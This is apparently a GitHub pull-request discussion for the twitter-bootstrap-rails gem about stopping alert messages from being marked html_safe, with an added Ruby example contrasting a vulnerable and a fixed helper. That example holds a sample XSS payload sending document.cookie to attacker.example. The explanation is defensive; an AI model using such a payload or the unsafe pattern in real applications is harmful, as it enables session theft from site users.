seyhunak / twitter-bootstrap-rails

Twitter Bootstrap for Rails 6.0, Rails 5 - Rails 4.x Asset Pipeline
https://github.com/seyhunak/twitter-bootstrap-rails
4.5k stars, 999 forks

Not marking msg as html_safe by default. #868

Closed panmari closed 8 years ago

panmari commented 8 years ago

This could be misused as an attack vector for XSS attacks. Added two tests for checking the behavior in both cases: whether the user escapes the message or not.

See also #856
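
The behaviour this PR is about, as an added example that is not code from the PR or from twitter-bootstrap-rails: a view helper that blesses its whole output with `html_safe` hands any caller-supplied text to the template unescaped, while the fixed form escapes the message unless the caller already marked it safe. Rails is not loaded here; `SafeString` and `render_to_html` are assumed stand-ins for `ActiveSupport::SafeBuffer` and the escaping `<%= %>` performs, and `bootstrap_alert_unsafe` / `bootstrap_alert_safe` are hypothetical helper names, not the gem's own.

```ruby
require "erb"

# Assumed stand-in for ActiveSupport::SafeBuffer: a SafeString claims it is
# already escaped; any other String does not.
class SafeString < String
  def html_safe?
    true
  end
end

class String
  def html_safe?
    false
  end
end

# What <%= %> does in a Rails view: escape unless the value says it is safe.
def render_to_html(value)
  value.html_safe? ? value.to_s : ERB::Util.html_escape(value.to_s)
end

# Vulnerable form (the behaviour the PR removes): the helper marks its whole
# output as html_safe, so a user-controlled message reaches the page verbatim.
def bootstrap_alert_unsafe(msg)
  SafeString.new(%(<div class="alert">#{msg}</div>))
end

# Fixed form: escape the message unless the caller marked it safe, and mark
# only the helper's own markup as safe. Both cases the PR tests are covered.
def bootstrap_alert_safe(msg)
  body = msg.html_safe? ? msg.to_s : ERB::Util.html_escape(msg.to_s)
  SafeString.new(%(<div class="alert">#{body}</div>))
end

# Constructed sample input: a flash message an attacker managed to control.
USER_PAYLOAD = "<script>document.location='https://attacker.example/?c='+document.cookie</script>".freeze
# Constructed sample input: markup the application authored and vetted itself.
TRUSTED_MARKUP = SafeString.new("Profile <b>saved</b>")

# Renders the three cases; returns a hash so the outcomes can be inspected.
def demo
  {
    unsafe_helper: render_to_html(bootstrap_alert_unsafe(USER_PAYLOAD)),
    safe_helper:   render_to_html(bootstrap_alert_safe(USER_PAYLOAD)),
    safe_trusted:  render_to_html(bootstrap_alert_safe(TRUSTED_MARKUP)),
  }
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |name, html| puts "#{name}: #{html}" }
end
```

With the unsafe helper the `<script>` tag survives into the rendered page; with the fixed helper it comes out as `&lt;script&gt;`, while a message the application itself marked safe still renders its `<b>`. Before depending on any view-helper gem, grepping its source for `html_safe` (for example under the path `bundle show <gem>` prints) is a cheap way to find helpers that make this decision on the caller's behalf.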

symmetriq commented 8 years ago

:+1:

The maintainers of this project need to stop flip-flopping on this issue. This was fixed on March 24, 2014 (commit), and applied to the Bootstrap 3 branch on April 1, 2014 (commit). On Dec 12, 2014 (commit), someone else came along and just re-added html_safe (seemingly oblivious to the fact that it was removed for a reason), and it went right back in without anybody questioning it.

At this point I'm now considering dropping this gem from the app I work on, but for the sake of people who still use it, this fix needs to go back in.

claudiob commented 8 years ago

@symmetriq In case you need an alternative, you might want to look at http://fullscreen.github.io/bh

panmari commented 8 years ago

Maybe now that I've added tests that mention the XSS issue there, people will be more hesitant to revert the change...

On Sat, Aug 8, 2015, 09:10 Claudio B. notifications@github.com wrote:
